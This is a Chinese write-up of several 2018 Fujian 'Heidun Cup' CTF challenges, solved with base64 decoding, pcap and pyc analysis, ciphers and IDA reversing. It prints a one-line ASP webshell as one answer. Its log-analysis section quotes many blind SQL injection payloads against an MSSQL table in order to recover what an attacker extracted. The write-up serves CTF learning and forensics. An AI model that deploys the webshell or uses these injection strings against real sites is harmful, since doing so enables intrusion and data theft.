【2018福建省“黑盾杯”】部分解题思路

本文主要是介绍【2018福建省“黑盾杯”】部分解题思路，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

由于我没有参加比赛，所以WEB部分没有办法解题

MISC

题目：CCGS

打开网页

使用binwalk进行分析

发现图片文件还藏着zip文件，提取出来，但是文件中的文字很多，用notepad++都卡，目测是Base64编码，所以写脚本解密之后保存文件：

import base64fp = open("secret.txt","r")
fp1 = open("secret.png","wb")
secret = fp.read()
#print secret
s1 = base64.b64decode(secret)
s1 = base64.b64decode(s1)
fp1.write(s1)
print
print "[+] Png write success"
fp1.close()
fp.close()

嗯，小姐姐还是挺好看的

题目：spartacus

这题是原题

<%execute request("images")%>，这个是一句话木马，然后用SHA1加密一下提交即可

好无趣

题目：TheSameInside

打开wireshark，追踪TCP流，看到里面有个数据包是在上传压缩文件的，所以把上传的数据导出来：

打开content.xml文件，看到里面实际上还有另一个压缩文件：

把这些数据导出来，看到是一个pyc脚本：

逆向PYC之后看到如下源码：

# File: F (Python 2.7)from sys import exitdef gold_room():print 'This room is full of gold. How much do you take?'next = raw_input('> ')if '0' in next or '1' in next:how_much = int(next)else:dead('Man, learn to type a number.')if how_much < 50:print 'You win VGVsbCB5b3UgYXJndj1mbGFn!'exit(0)else:dead('You greedy bastard!')def bear_room():print 'There is a bear here.'print 'The bear has a bunch of honey.'print 'The fat bear is in front of another door.'print 'How are you going to move the bear?'bear_moved = Falsewhile True:next = raw_input('> ')if next == 'take honey':dead('The bear looks at you then slaps your face off.')continueif next == 'taunt bear' and not bear_moved:print 'The bear has moved from the door. You can go through it now.'bear_moved = Truecontinueif next == 'taunt bear' and bear_moved:dead('The bear gets pissed off and chews your leg off.')continueif next == 'open door' and bear_moved:gold_room()continueprint 'I got no idea what that means.'def cthulhu_room():print 'Here you see the great evil Cthulhu.'print 'He, it, whatever stares at you and you go insane.'print 'Do you flee for your life or eat your head?'next = raw_input('> ')if 'flee' in next:start()elif 'head' in next:dead('Well that was tasty!')else:cthulhu_room()def dead(why):print why, 'Good job!'exit(0)def start():print 'You are in a dark room.'print 'There is a door to your right and left.'print 'Which one do you take?'next = raw_input('> ')if next == 'left':bear_room()elif next == 'right':cthulhu_room()else:dead('You stumble around the room until you starve.')start()

找到里面的“ print 'You win VGVsbCB5b3UgYXJndj1mbGFn!'”，用base64解密后一半的字符串，发现是一个暗示

到这步卡了很久，跟其他几个大佬讨论了一下，说是用十六进制编辑器打开，查找关键字argv，然后后面那串字符带入即可：

后面出题人自己出来说是单表置换，所以解出来得可能是

我暂时认为flag就是 flag is How dogs is

所以出题人是恋爱了？然后再嘲讽一波单身狗？

题目：注入日志分析

用notepad++打开，发现是访问的日志

这里内容比较多，而且无效的信息也比较多，所以用py写了一个脚本，只筛选处访问的参数以及是否报错，同时也进行url解码

# coding: utf8import urllibfp = open("data.log","r")
fp1 = open("data_se.log","w")
for i in fp.readlines():# 跳过注释if i[0] == "#":continue# 截取访问的资源和访问的参数reqs = i.split(" ")decode_s = urllib.unquote(reqs[6])print "[*]",decode_sfp1.write(decode_s+"\n")
print "[+] write ok"fp1.close()
fp.close()

因为这里需要知道攻击者拿了哪些东西，所以只要知道他从最总的目标表中dump出什么东西，所以只要从后面开始找是否存在明显的表名就可以了。

很明显的是，攻击者从theflag表中dump出了数据。

重点关注跟theflag有关的日志：

id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>53|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>49
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>98
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>99|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>53
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>100
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>102|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>101
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>49|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>98
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>99
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>53
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>32|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>16|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>8|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>4|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>2|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>1|18|800a0bcd|BOF_或_EOF_中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。

赛选的原则就是如果表达式逻辑正确，就不会显示中文报错提示

最后得到：53，99，54，102，49，100，54

解码得到：5c6f1d6

Crypto

题目：这是啥呀？

MZWGCZ33MM4GENJVHBRDSNJUGAYTSOBVGZTDAYRQGIZTINLEMMZTSNJVHBRX2===

很明显的Base32编码特征：全大写字母+数字+等号

直接base32解码得到flag：flag{c8b558b954019856f0b02345dc39558c}

题目：brightstar

snkeegt fhstetr Iedsabs tnaktrt otessha iiriwis tethees

key： howarey

Columnar Transposition Cipher

嗯，我就喜欢简单粗暴的，直接说这是列位移密码，具体的规则如下：

所以flag:ltisofteninthedarkestskiesthatweseebrighteststarts

RE

题目：reverseMe

用IDA还原伪代码：

__int64 __cdecl main_0()
{int v0; // edx__int64 v1; // ST00_8int v3; // [esp+0h] [ebp-1A0h]const char **v4; // [esp+4h] [ebp-19Ch]const char **v5; // [esp+8h] [ebp-198h]int v6; // [esp+Ch] [ebp-194h]int i; // [esp+D4h] [ebp-CCh]int v8; // [esp+E0h] [ebp-C0h]int v9; // [esp+ECh] [ebp-B4h]int v10; // [esp+F0h] [ebp-B0h]int v11; // [esp+F4h] [ebp-ACh]int v12; // [esp+F8h] [ebp-A8h]int v13; // [esp+FCh] [ebp-A4h]int v14; // [esp+100h] [ebp-A0h]int v15; // [esp+104h] [ebp-9Ch]int v16; // [esp+108h] [ebp-98h]int v17; // [esp+10Ch] [ebp-94h]int v18; // [esp+110h] [ebp-90h]int v19; // [esp+114h] [ebp-8Ch]int v20; // [esp+118h] [ebp-88h]int v21; // [esp+11Ch] [ebp-84h]int v22; // [esp+120h] [ebp-80h]int v23; // [esp+124h] [ebp-7Ch]int v24; // [esp+128h] [ebp-78h]int v25; // [esp+12Ch] [ebp-74h]int v26; // [esp+130h] [ebp-70h]int v27; // [esp+134h] [ebp-6Ch]int v28; // [esp+138h] [ebp-68h]int v29; // [esp+13Ch] [ebp-64h]int v30; // [esp+140h] [ebp-60h]char v31; // [esp+14Fh] [ebp-51h]char v32[17]; // [esp+178h] [ebp-28h]char v33; // [esp+189h] [ebp-17h]char v34; // [esp+18Ah] [ebp-16h]char v35; // [esp+18Bh] [ebp-15h]char v36; // [esp+18Ch] [ebp-14h]char v37; // [esp+18Dh] [ebp-13h]v31 = 0;v9 = 1;v10 = 4;v11 = 14;v12 = 10;v13 = 5;v14 = 36;v15 = 23;v16 = 42;v17 = 13;v18 = 19;v19 = 28;v20 = 13;v21 = 27;v22 = 39;v23 = 48;v24 = 41;v25 = 42;v26 = 26;v27 = 20;v28 = 59;v29 = 4;v30 = 0;printf("plz enter the flag:");while ( 1 ){v6 = getch();v32[v31] = v6;if ( !(_BYTE)v6 || v32[v31] == 13 )break;if ( v32[v31] == 8 ){printf("\b\b");--v31;}else{printf("%c", v32[v31++]);}}v8 = 0;for ( i = 0; i < 17; ++i ){if ( v32[i] != byte_415768[*(&v9 + i)] )v8 = 1;}if ( v33 != 49 || v34 != 48 || v35 != 50 || v36 != 52 || v37 != 125 )v8 = 1;v32[v31] = 0;printf("\r\n");if ( v8 ){printf("u r wrong\r\n\r\n");main(v3, v4, v5);}else{printf("u r right!\r\n");}system("pause");HIDWORD(v1) = v0;LODWORD(v1) = 0;return v1;
}

这里看到两个关键的逻辑

1、前面17位必须和byte_415768数组中的相应值相同，而相应值可以在最初变量赋值的时候看到

2、最后5位是“1024}”

用IDA找到byte_415768

所以很简单，所以写脚本就能算出来

# coding: utf8s1 = 'IKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138'
l = [1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42]
tmp = ''
for i in l:tmp += s1[i]
tmp += "1024}"
print tmp

得到结果